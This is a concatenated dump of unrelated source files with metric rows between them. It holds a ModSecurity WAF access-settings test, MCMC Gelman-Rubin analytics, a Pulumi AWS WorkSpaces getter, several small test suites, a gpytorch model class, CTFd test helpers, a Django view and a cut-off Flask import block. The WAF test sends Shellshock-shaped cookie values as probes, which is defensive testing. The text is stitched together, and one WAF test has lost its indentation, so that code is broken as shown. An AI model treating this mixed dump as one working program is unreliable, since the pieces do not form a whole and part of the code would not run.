    #"ignore_cookie": ["(?i)(sketchy_origin)", "(?i)(yousocrazy)"]
    l_uri = G_TEST_HOST
    l_headers = {"host": "myhost.com",
                 "Cookie": "SkeTchy_Origin=function () { asdf asdf asdf"
                 }
    l_r = requests.get(l_uri, headers=l_headers)
    assert l_r.status_code == 200
    l_r_json = l_r.json()
    # We get no event
    assert len(l_r_json) == 0

    l_uri = G_TEST_HOST
    l_headers = {"host": "myhost.com",
                 "Cookie": "SkeTchy_Origin=function () { asdf asdf asdf"
                 }
    l_r = requests.get(l_uri, headers=l_headers)
    assert l_r.status_code == 200
    l_r_json = l_r.json()
    assert len(l_r_json) == 0
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_08_ignore_cookie_in_ignore_cookie_list
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_08_bypass_cookie_in_ignore_cookie_list_regex():
########################################
# Test regex "^[0-9_].*$"
########################################
l_uri = G_TEST_HOST
l_headers = {"host" : "myhost.com",
"Cookie" : "0_123_ADB__bloop=function () { asdf asdf asdf"
}
l_r = requests.get(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
assert len(l_r_json) == 0
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_09_block_disallowed_http_method
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_09_block_disallowed_http_method():
l_uri = G_TEST_HOST
l_headers = {"host" : "myhost.com"
}
l_r = requests.put(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
assert len(l_r_json) > 0
assert 'Method is not allowed by policy' in l_r_json['rule_msg']
teardown_func()
| 49.458937 | 117 | 0.511428 | 1,191 | 10,238 | 3.985726 | 0.179681 | 0.0257 | 0.051822 | 0.050137 | 0.68043 | 0.669686 | 0.633453 | 0.609859 | 0.603328 | 0.576153 | 0 | 0.015811 | 0.153643 | 10,238 | 206 | 118 | 49.699029 | 0.532025 | 0.368529 | 0 | 0.5 | 0 | 0 | 0.202672 | 0.064392 | 0 | 0 | 0 | 0.004854 | 0.202899 | 0 | null | null | 0.036232 | 0.057971 | null | null | 0.036232 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c75ec65b0817a875da33fd517bd4f04f459ffba4 | 2,852 | py | Python | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-09-15T10:10:26.000Z | 2021-09-15T10:10:26.000Z | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | null | null | null | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-06-11T15:29:43.000Z | 2021-06-11T15:29:43.000Z | #coding: utf-8
from __future__ import print_function
from builtins import zip
from builtins import object
from cosmosis import output as output_module
import numpy as np
import sys
import os
class Analytics(object):
def __init__(self, params, pool=None):
self.params = params
self.pool = pool
self.total_steps = 0
nparam = len(params)
self.means = np.zeros(nparam)
self.m2 = np.zeros(nparam)
self.cov_times_n = np.zeros((nparam,nparam))
def add_traces(self, traces):
if traces.shape[1] != len(self.params):
raise RuntimeError("The number of traces added to Analytics "
"does not match the number of varied "
"parameters!")
num = float(self.total_steps)
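        # Welford-style online update of the running means, m2 and covariance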
for x in traces:
num += 1.0
delta = x - self.means
old_means = self.means.copy()
self.means += delta/num
self.m2 += delta*(x - self.means)
self.cov_times_n += np.outer(x-self.means, x-old_means)
self.total_steps += traces.shape[0]
def trace_means(self):
if self.pool:
return np.array(self.pool.gather(self.means)).T
else:
return self.means
def trace_variances(self):
if self.total_steps > 1:
local_variance = self.m2 / float(self.total_steps-1)
if self.pool:
return np.array(self.pool.gather(local_variance)).T
else:
return local_variance
return None
def gelman_rubin(self, quiet=True):
        # takes current traces and returns the Gelman-Rubin statistic Rhat for each parameter
if self.pool is None or not self.pool.size > 1:
raise RuntimeError("Gelman-Rubin statistic is only "
"valid for multiple chains.")
if self.total_steps == 0:
raise RuntimeError("Gelman-Rubin statistic not "
"defined for 0-length chains.")
# gather trace statistics to master process
means = self.trace_means()
variances = self.trace_variances()
if self.pool.is_master():
B_over_n = np.var(means, ddof=1, axis=1)
B = B_over_n * self.total_steps
W = np.mean(variances, axis=1)
V = ((1. - 1./self.total_steps) * W +
(1. + 1./self.pool.size) * B_over_n)
# TODO: check for 0-values in W
Rhat = np.sqrt(V/W)
else:
Rhat = None
Rhat = self.pool.bcast(Rhat)
if not quiet and self.pool.is_master():
print()
print("Gelman-Rubin:")
for (p,R) in zip(self.params, Rhat):
print(" ", p, " ", R)
print("Worst = ", Rhat.max())
print()
return Rhat
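

# A minimal usage sketch (hypothetical parameter names; a real run passes the
# pipeline's varied-parameter list and, for gelman_rubin, an MPI pool):
#
#   analytics = Analytics(params=["omega_m", "sigma_8"])
#   analytics.add_traces(chain)        # chain: array of shape (n_steps, 2)
#   means, variances = analytics.trace_means(), analytics.trace_variances()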
| 31.688889 | 73 | 0.543829 | 361 | 2,852 | 4.182825 | 0.310249 | 0.058278 | 0.074172 | 0.019868 | 0.117881 | 0.049007 | 0.049007 | 0.049007 | 0.049007 | 0 | 0 | 0.011983 | 0.356241 | 2,852 | 89 | 74 | 32.044944 | 0.810458 | 0.041374 | 0 | 0.1 | 0 | 0 | 0.08315 | 0 | 0 | 0 | 0 | 0.011236 | 0 | 1 | 0.071429 | false | 0 | 0.1 | 0 | 0.271429 | 0.085714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7675ba7953da5231174f58bf3d8e9f9039a7d72 | 5,668 | py | Python | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 29 | 2021-09-30T19:32:07.000Z | 2022-03-22T21:06:08.000Z | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 232 | 2021-09-30T19:26:26.000Z | 2022-03-31T23:22:06.000Z | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 4 | 2021-11-10T19:42:01.000Z | 2022-02-05T10:15:49.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetWorkspaceResult',
'AwaitableGetWorkspaceResult',
'get_workspace',
'get_workspace_output',
]
@pulumi.output_type
class GetWorkspaceResult:
def __init__(__self__, bundle_id=None, directory_id=None, id=None, root_volume_encryption_enabled=None, tags=None, user_volume_encryption_enabled=None, volume_encryption_key=None, workspace_properties=None):
if bundle_id and not isinstance(bundle_id, str):
raise TypeError("Expected argument 'bundle_id' to be a str")
pulumi.set(__self__, "bundle_id", bundle_id)
if directory_id and not isinstance(directory_id, str):
raise TypeError("Expected argument 'directory_id' to be a str")
pulumi.set(__self__, "directory_id", directory_id)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if root_volume_encryption_enabled and not isinstance(root_volume_encryption_enabled, bool):
raise TypeError("Expected argument 'root_volume_encryption_enabled' to be a bool")
pulumi.set(__self__, "root_volume_encryption_enabled", root_volume_encryption_enabled)
if tags and not isinstance(tags, list):
raise TypeError("Expected argument 'tags' to be a list")
pulumi.set(__self__, "tags", tags)
if user_volume_encryption_enabled and not isinstance(user_volume_encryption_enabled, bool):
raise TypeError("Expected argument 'user_volume_encryption_enabled' to be a bool")
pulumi.set(__self__, "user_volume_encryption_enabled", user_volume_encryption_enabled)
if volume_encryption_key and not isinstance(volume_encryption_key, str):
raise TypeError("Expected argument 'volume_encryption_key' to be a str")
pulumi.set(__self__, "volume_encryption_key", volume_encryption_key)
if workspace_properties and not isinstance(workspace_properties, dict):
raise TypeError("Expected argument 'workspace_properties' to be a dict")
pulumi.set(__self__, "workspace_properties", workspace_properties)
@property
@pulumi.getter(name="bundleId")
def bundle_id(self) -> Optional[str]:
return pulumi.get(self, "bundle_id")
@property
@pulumi.getter(name="directoryId")
def directory_id(self) -> Optional[str]:
return pulumi.get(self, "directory_id")
@property
@pulumi.getter
def id(self) -> Optional[str]:
return pulumi.get(self, "id")
@property
@pulumi.getter(name="rootVolumeEncryptionEnabled")
def root_volume_encryption_enabled(self) -> Optional[bool]:
return pulumi.get(self, "root_volume_encryption_enabled")
@property
@pulumi.getter
def tags(self) -> Optional[Sequence['outputs.WorkspaceTag']]:
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="userVolumeEncryptionEnabled")
def user_volume_encryption_enabled(self) -> Optional[bool]:
return pulumi.get(self, "user_volume_encryption_enabled")
@property
@pulumi.getter(name="volumeEncryptionKey")
def volume_encryption_key(self) -> Optional[str]:
return pulumi.get(self, "volume_encryption_key")
@property
@pulumi.getter(name="workspaceProperties")
def workspace_properties(self) -> Optional['outputs.WorkspaceProperties']:
return pulumi.get(self, "workspace_properties")
class AwaitableGetWorkspaceResult(GetWorkspaceResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWorkspaceResult(
bundle_id=self.bundle_id,
directory_id=self.directory_id,
id=self.id,
root_volume_encryption_enabled=self.root_volume_encryption_enabled,
tags=self.tags,
user_volume_encryption_enabled=self.user_volume_encryption_enabled,
volume_encryption_key=self.volume_encryption_key,
workspace_properties=self.workspace_properties)
def get_workspace(id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWorkspaceResult:
"""
Resource Type definition for AWS::WorkSpaces::Workspace
"""
__args__ = dict()
__args__['id'] = id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws-native:workspaces:getWorkspace', __args__, opts=opts, typ=GetWorkspaceResult).value
return AwaitableGetWorkspaceResult(
bundle_id=__ret__.bundle_id,
directory_id=__ret__.directory_id,
id=__ret__.id,
root_volume_encryption_enabled=__ret__.root_volume_encryption_enabled,
tags=__ret__.tags,
user_volume_encryption_enabled=__ret__.user_volume_encryption_enabled,
volume_encryption_key=__ret__.volume_encryption_key,
workspace_properties=__ret__.workspace_properties)
@_utilities.lift_output_func(get_workspace)
def get_workspace_output(id: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetWorkspaceResult]:
"""
Resource Type definition for AWS::WorkSpaces::Workspace
"""
...
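

# A minimal usage sketch (hypothetical workspace id; assumes a Pulumi program
# with the AWS Native provider configured):
#
#   ws = get_workspace(id="ws-0123456789abcdef0")
#   pulumi.export("bundleId", ws.bundle_id)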
| 41.985185 | 211 | 0.711009 | 655 | 5,668 | 5.783206 | 0.174046 | 0.152059 | 0.145723 | 0.085533 | 0.399155 | 0.288015 | 0.217001 | 0.131204 | 0.054382 | 0.054382 | 0 | 0.000219 | 0.195483 | 5,668 | 134 | 212 | 42.298507 | 0.830482 | 0.054693 | 0 | 0.09434 | 1 | 0 | 0.172051 | 0.077573 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113208 | false | 0 | 0.056604 | 0.075472 | 0.283019 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c768fa044e6b10f72fbfbfa85435ada393a83af3 | 673 | py | Python | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | 1 | 2018-05-30T15:33:26.000Z | 2018-05-30T15:33:26.000Z | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | null | null | null | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from quail.distance import *
import numpy as np
import pytest
def test_match():
a = 'A'
b = 'B'
assert np.equal(match(a, b), 1)
def test_euclidean_list():
a = [0, 1, 0]
b = [0, 1, 0]
assert np.equal(euclidean(a, b), 0)
def test_euclidean_array():
a = np.array([0, 1, 0])
b = np.array([0, 1, 0])
assert np.equal(euclidean(a, b), 0)
def test_correlation_list():
a = [0, 1, 0]
b = [0, 1, 0]
assert np.equal(correlation(a, b), 1)
def test_correlation_array():
a = np.array([0, 1, 0])
b = np.array([0, 1, 0])
assert np.equal(correlation(a, b), 1)
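

# The list/array cases above could be consolidated with pytest's parametrize
# (a sketch, not part of the original suite):
#
# @pytest.mark.parametrize("fn,expected", [(euclidean, 0), (correlation, 1)])
# def test_distance_parametrized(fn, expected):
#     assert np.equal(fn([0, 1, 0], [0, 1, 0]), expected)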
| 21.03125 | 41 | 0.580981 | 117 | 673 | 3.264957 | 0.230769 | 0.041885 | 0.062827 | 0.041885 | 0.557592 | 0.513089 | 0.513089 | 0.513089 | 0.513089 | 0.513089 | 0 | 0.058594 | 0.239227 | 673 | 31 | 42 | 21.709677 | 0.6875 | 0.031204 | 0 | 0.5 | 0 | 0 | 0.003077 | 0 | 0 | 0 | 0 | 0 | 0.208333 | 1 | 0.208333 | false | 0 | 0.166667 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c76ca1375282328ef3e6038f93b1edf1d46d7f49 | 1,728 | py | Python | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python2.7
import unittest
import canning
class TestNop(unittest.TestCase):
def test_nop(self):
canning.NopTeeFd.write("asdf")
class TestSlice(unittest.TestCase):
REPORT = "20130505T065614Z-VN-AS24173-dns_consistency-no_report_id-0.1.0-probe.yaml"
@staticmethod
def rpt(year):
assert year < 10000
return "{:04d}1231T065614Z-VN-AS24173-dns_consistency-no_report_id-0.1.0-probe.yaml".format(
year
)
def test_empty(self):
asis, tarfiles = canning.pack_bucket(tuple())
self.assertFalse(asis)
self.assertFalse(tarfiles)
def test_badname(self):
self.assertRaises(RuntimeError, canning.pack_bucket, [("foo", 42)])
self.assertRaises(
RuntimeError, canning.pack_bucket, [("2013-05-05/" + self.REPORT, 42)]
)
def test_single(self):
for sz in [0, 1, 65 * 1048576]:
asis, tarfiles = canning.pack_bucket([(self.REPORT, sz)])
self.assertEqual(asis, [self.REPORT])
self.assertFalse(tarfiles)
def test_packing(self):
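        # the 64 MiB report should stay as-is; the two smaller ones get tarred together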
asis, tarfiles = canning.pack_bucket(
[(self.rpt(0), 42), (self.rpt(1), 64), (self.rpt(2), 64 * 1048576)]
)
self.assertEqual(asis, [self.rpt(2)])
self.assertEqual(tarfiles, {"dns_consistency.0.tar": map(self.rpt, (0, 1))})
def test_stupid(self): # FIXME: is it really good behaviour?...
asis, tarfiles = canning.pack_bucket(
[(self.rpt(0), 42), (self.rpt(1), 64 * 1048576 - 1), (self.rpt(2), 64)]
)
self.assertEqual(asis, map(self.rpt, (0, 1, 2)))
self.assertEqual(tarfiles, {})
if __name__ == "__main__":
unittest.main()
| 30.315789 | 100 | 0.609375 | 216 | 1,728 | 4.75 | 0.351852 | 0.061404 | 0.099415 | 0.089669 | 0.421053 | 0.339181 | 0.183236 | 0.183236 | 0.183236 | 0.183236 | 0 | 0.085366 | 0.240741 | 1,728 | 56 | 101 | 30.857143 | 0.696646 | 0.03588 | 0 | 0.097561 | 0 | 0.02439 | 0.117188 | 0.101563 | 0 | 0 | 0 | 0.017857 | 0.268293 | 1 | 0.170732 | false | 0 | 0.04878 | 0 | 0.317073 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c76e7fcaeb2193c977b2c4ee81febf00b7763cee | 2,175 | py | Python | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | 1 | 2019-09-30T06:51:03.000Z | 2019-09-30T06:51:03.000Z | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | null | null | null | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | 1 | 2020-09-16T16:35:27.000Z | 2020-09-16T16:35:27.000Z | #!/usr/bin/env python3
from .gp import GP
from .pyro import _PyroMixin # This will only contain functions if Pyro is installed
class ApproximateGP(GP, _PyroMixin):
def __init__(self, variational_strategy):
super().__init__()
self.variational_strategy = variational_strategy
def forward(self, x):
"""
As in the exact GP setting, the user-defined forward method should return the GP prior mean and covariance
evaluated at input locations x.
"""
raise NotImplementedError
def pyro_guide(self, input, beta=1.0, name_prefix=""):
"""
(For Pyro integration only). The component of a `pyro.guide` that
corresponds to drawing samples from the latent GP function.
Args:
:attr:`input` (:obj:`torch.Tensor`)
The inputs :math:`\mathbf X`.
:attr:`beta` (float, default=1.)
How much to scale the :math:`\text{KL} [ q(\mathbf f) \Vert p(\mathbf f) ]`
term by.
:attr:`name_prefix` (str, default="")
A name prefix to prepend to pyro sample sites.
"""
return super().pyro_guide(input, beta=beta, name_prefix=name_prefix)
def pyro_model(self, input, beta=1.0, name_prefix=""):
r"""
(For Pyro integration only). The component of a `pyro.model` that
corresponds to drawing samples from the latent GP function.
Args:
:attr:`input` (:obj:`torch.Tensor`)
The inputs :math:`\mathbf X`.
:attr:`beta` (float, default=1.)
How much to scale the :math:`\text{KL} [ q(\mathbf f) \Vert p(\mathbf f) ]`
term by.
:attr:`name_prefix` (str, default="")
A name prefix to prepend to pyro sample sites.
Returns: :obj:`torch.Tensor` samples from :math:`q(\mathbf f)`
"""
return super().pyro_model(input, beta=beta, name_prefix=name_prefix)
def __call__(self, inputs, prior=False, **kwargs):
if inputs.dim() == 1:
inputs = inputs.unsqueeze(-1)
return self.variational_strategy(inputs, prior=prior)
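

# A minimal subclassing sketch (assumes gpytorch's standard variational
# components; SVGPModel and the size choices are illustrative):
#
# from gpytorch.variational import CholeskyVariationalDistribution, VariationalStrategy
#
# class SVGPModel(ApproximateGP):
#     def __init__(self, inducing_points):
#         variational_distribution = CholeskyVariationalDistribution(inducing_points.size(-2))
#         variational_strategy = VariationalStrategy(
#             self, inducing_points, variational_distribution, learn_inducing_locations=True)
#         super().__init__(variational_strategy)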
| 38.157895 | 114 | 0.593563 | 276 | 2,175 | 4.568841 | 0.355072 | 0.079302 | 0.054718 | 0.042823 | 0.536082 | 0.536082 | 0.536082 | 0.496431 | 0.439334 | 0.374306 | 0 | 0.00584 | 0.291494 | 2,175 | 56 | 115 | 38.839286 | 0.812459 | 0.538391 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0 | 0.117647 | 0 | 0.647059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c774024668ea75381f4aedf887a584aaa227cbf7 | 320 | py | Python | 1stRound/Medium/322-Coin Change/DP.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | 2 | 2020-04-24T18:36:52.000Z | 2020-04-25T00:15:57.000Z | 1stRound/Medium/322-Coin Change/DP.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | null | null | null | 1stRound/Medium/322-Coin Change/DP.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | null | null | null | from typing import List


class Solution:
def coinChange(self, coins: List[int], amount: int) -> int:
M = float('inf')
        # dynamic programming: dp[i] = fewest coins summing to amount i (M = unreachable)
dp = [0] + [M] * amount
for i in range(1, amount+1):
dp[i] = 1 + min([dp[i-c] for c in coins if i >= c] or [M])
return dp[-1] if dp[-1] < M else -1
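

# Quick check (illustrative): Solution().coinChange([1, 2, 5], 11) == 3, since 11 = 5 + 5 + 1.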
| 32 | 70 | 0.496875 | 52 | 320 | 3.057692 | 0.519231 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033019 | 0.3375 | 320 | 9 | 71 | 35.555556 | 0.716981 | 0.059375 | 0 | 0 | 0 | 0 | 0.010033 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c77943cb74b84356ac52ea818e7a35cca299778c | 4,040 | py | Python | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | 1 | 2019-06-25T09:24:29.000Z | 2019-06-25T09:24:29.000Z | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | null | null | null | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | null | null | null | from CTFd import create_app
from CTFd.models import *
from sqlalchemy_utils import database_exists, create_database, drop_database
from sqlalchemy.engine.url import make_url
import datetime
import json
import six
if six.PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
def create_ctfd(ctf_name="CTFd", name="admin", email="admin@ctfd.io", password="password", setup=True):
app = create_app('CTFd.config.TestingConfig')
if setup:
with app.app_context():
with app.test_client() as client:
data = {}
r = client.get('/setup') # Populate session with nonce
with client.session_transaction() as sess:
data = {
"ctf_name": ctf_name,
"name": name,
"email": email,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/setup', data=data)
return app
def destroy_ctfd(app):
drop_database(app.config['SQLALCHEMY_DATABASE_URI'])
def register_user(app, name="user", email="user@ctfd.io", password="password"):
with app.app_context():
with app.test_client() as client:
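            # GET first so the session is populated with a CSRF nonce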
r = client.get('/register')
with client.session_transaction() as sess:
data = {
"name": name,
"email": email,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/register', data=data)
def login_as_user(app, name="user", password="password"):
with app.app_context():
with app.test_client() as client:
r = client.get('/login')
with client.session_transaction() as sess:
data = {
"name": name,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/login', data=data)
return client
def get_scores(user):
scores = user.get('/scores')
scores = json.loads(scores.get_data(as_text=True))
return scores['standings']
def gen_challenge(db, name='chal_name', description='chal_description', value=100, category='chal_category', type=0):
chal = Challenges(name, description, value, category)
db.session.add(chal)
db.session.commit()
return chal
def gen_award(db, teamid, name="award_name", value=100):
award = Awards(teamid, name, value)
db.session.add(award)
db.session.commit()
return award
def gen_tag(db, chal, tag='tag_tag'):
tag = Tags(chal, tag)
db.session.add(tag)
db.session.commit()
return tag
def gen_file():
pass
def gen_flag(db, chal, flag='flag', key_type=0):
key = Keys(chal, flag, key_type)
db.session.add(key)
db.session.commit()
return key
def gen_team(db, name='name', email='user@ctfd.io', password='password'):
team = Teams(name, email, password)
db.session.add(team)
db.session.commit()
return team
def gen_hint(db, chal, hint="This is a hint", cost=0, type=0):
hint = Hints(chal, hint, cost, type)
db.session.add(hint)
db.session.commit()
return hint
def gen_solve(db, teamid, chalid, ip='127.0.0.1', flag='rightkey'):
solve = Solves(teamid, chalid, ip, flag)
solve.date = datetime.datetime.utcnow()
db.session.add(solve)
db.session.commit()
return solve
def gen_wrongkey(db, teamid, chalid, ip='127.0.0.1', flag='wrongkey'):
wrongkey = WrongKeys(teamid, chalid, ip, flag)
wrongkey.date = datetime.datetime.utcnow()
db.session.add(wrongkey)
db.session.commit()
return wrongkey
def gen_tracking(db, ip, team):
tracking = Tracking(ip, team)
db.session.add(tracking)
db.session.commit()
return tracking
def gen_page(db, route, html):
page = Pages(route, html)
db.session.add(page)
db.session.commit()
return page
| 27.297297 | 117 | 0.592574 | 506 | 4,040 | 4.628459 | 0.209486 | 0.076857 | 0.051238 | 0.089667 | 0.272844 | 0.272844 | 0.253202 | 0.204526 | 0.186166 | 0.128096 | 0 | 0.00789 | 0.278465 | 4,040 | 147 | 118 | 27.482993 | 0.79554 | 0.006683 | 0 | 0.292035 | 0 | 0 | 0.096485 | 0.011967 | 0 | 0 | 0 | 0 | 0 | 1 | 0.141593 | false | 0.079646 | 0.053097 | 0 | 0.309735 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c77bfcd69447b6d8753b518a3930aaea586d8856 | 440 | py | Python | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 1 | 2021-11-25T19:37:01.000Z | 2021-11-25T19:37:01.000Z | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 197 | 2017-09-06T22:54:20.000Z | 2022-02-05T00:04:13.000Z | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 2 | 2017-11-08T02:13:03.000Z | 2020-09-30T19:48:12.000Z | from django.shortcuts import render
from django.http import HttpResponseRedirect
from .models import SupportProject
# Create your views here.
def index( request ):
sp = SupportProject.objects.all()
if sp.count() == 1:
return HttpResponseRedirect( sp.first().project.get_absolute_url() )
else:
context_dict = { 'sps' : sp, }
return render( request, 'support/index.html', context_dict )
| 27.5 | 76 | 0.688636 | 51 | 440 | 5.862745 | 0.686275 | 0.06689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002874 | 0.209091 | 440 | 15 | 77 | 29.333333 | 0.856322 | 0.052273 | 0 | 0 | 0 | 0 | 0.050602 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c77d8ee927213d5c37d334a8dc0c0e3d7493a2cf | 2,221 | py | Python | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | 2 | 2021-01-13T22:52:16.000Z | 2021-01-29T18:37:51.000Z | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | 32 | 2021-01-08T19:05:33.000Z | 2021-04-07T22:01:54.000Z | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | null | null | null | from datetime import datetime
from werkzeug.security import generate_password_hash
from flask import Blueprint, jsonify, request
from sqlalchemy.orm import joinedload
from flask_login import login_required
